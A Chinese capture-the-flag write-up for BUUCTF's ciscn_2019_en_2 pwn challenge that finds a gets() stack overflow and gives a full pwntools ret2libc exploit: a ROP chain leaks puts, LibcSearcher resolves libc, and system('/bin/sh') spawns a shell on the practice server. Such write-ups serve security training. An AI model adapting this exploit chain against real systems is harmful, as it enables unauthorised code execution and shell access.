buuctf中的ciscn_2019_en_2

首先checksec检查保护机制：

-64位程序

-开启了栈不可执行保护

接下来使用IDA反汇编工具进行分析：

发现begin函数，点进去

begin函数内部：

输入1可用进入encrypt函数，输入2可从主函数看到并没有什么用，3是退出程序

这是encrypt函数内部：

get函数可触发栈溢出漏洞，看到这一行代码就可用了，下面的加密过程对破解程序无任何帮助。顺便算出s到栈底的偏移：0x50+0x8 = 0x58

由于在IDA中没发现任何后门函数和system函数地址，所以这里考虑泄露libc后来得到system函数和/bin/sh，这里我们需要构造ROP链来调用函数，所以还需用到ret和rdi的地址，输入以下指令：

ROPgadget --binary pwn --only "pop|ret"

rdi地址：0x400c83，ret地址：0x4006b9，q其中rdi用于调用函数，ret用于栈对齐

再在IDA中拿到encrypt地址，用于第一次泄露libc后再次进入encrypt函数：0x4009A0

基本信息拿到，可用来写exp攻击脚本了：

from pwn import * from LibcSearcher import LibcSearcher context(arch='amd64', os='linux', log_level='debug') #io = process('./pwn') # 在本地运行程序。 # gdb.attach(io) # 启动 GDB io = connect('node5.buuoj.cn',28902) # 与在线环境交互。 encrypt_addr = 0x4009A0 offset = 0x58 elf = ELF('./pwn') puts_got = elf.got['puts'] puts_plt = elf.plt['puts'] rdi_addr = 0x400c83 ret_addr = 0x4006b9 io.recvuntil(b'Input your choice!\n') io.sendline(b'1') io.recvuntil(b'Input your Plaintext to be encrypted\n') payload = b'a'*offset + p64(rdi_addr) + p64(puts_got) + p64(puts_plt) + p64(encrypt_addr) io.sendline(payload) io.recvline() io.recvline() puts_addr = u64(io.recvline().strip().ljust(8,b'\x00')) print(hex(puts_addr)) libc = LibcSearcher('puts',puts_addr) libc_base = puts_addr - libc.dump('puts') system_addr = libc_base + libc.dump('system') bin_sh_addr = libc_base + libc.dump('str_bin_sh') io.recvuntil(b'Input your Plaintext to be encrypted\n') payload = b'a'*offset + p64(ret_addr) + p64(rdi_addr) + p64(bin_sh_addr) + p64(system_addr) io.sendline(payload) io.interactive()

这是运行结果：

这里需要手动选择libc，64位程序就选64位的libc，可能会选到不适配的libc库，多试几次就可用了，拿到shell后手动输入cat flag拿到flag